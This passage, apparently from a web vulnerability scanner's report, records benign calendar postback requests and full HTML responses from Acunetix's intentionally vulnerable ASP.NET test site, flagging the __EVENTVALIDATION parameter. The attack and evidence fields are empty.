style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8152&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAXt%2FgJ9oIZGRkfqjS3cGq37Q15CHquxOJ%2FIt6j%2Bk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2BjZWNCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPheJzGEpEH%2BQ845HT9Ne%2F2xlC180%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:23 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAXt/gJ9oIZGRkfqjS3cGq37Q15CHquxOJ/It6j+k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+jZWNCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPheJzGEpEH+Q845HT9Ne/2xlC180=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:White" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8185&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAAFfPQdoIZGRkwVDgdGLxOEYNHEngvRRBMe0MniE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2BvpByArrjr%2BwOApyKwu8BAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6%2FSUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng%2FQwC19ng%2FQwC19mUkAQC19mUkAQC19nI%2BQIC19nI%2BQIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW%2Fw8CqOCW%2Fw8CqOCKkgcCqOCKkgcCqOC%2BKQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg%2BocKAqjg%2BocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9%2FTiBQKN9%2FTiBQKN9%2Bi5DQKN9%2Bi5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD6Ci7lETR9GRe3qRlzzbcO1Vhed4
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:38 GMT Content-Length: 12440
Response Body - size: 12,440 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAAFfPQdoIZGRkwVDgdGLxOEYNHEngvRRBMe0MniE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+vpByArrjr+wOApyKwu8BAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6/SUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng/QwC19ng/QwC19mUkAQC19mUkAQC19nI+QIC19nI+QIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW/w8CqOCW/w8CqOCKkgcCqOCKkgcCqOC+KQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg+ocKAqjg+ocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9/TiBQKN9/TiBQKN9+i5DQKN9+i5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD6Ci7lETR9GRe3qRlzzbcO1Vhed4" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:White" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 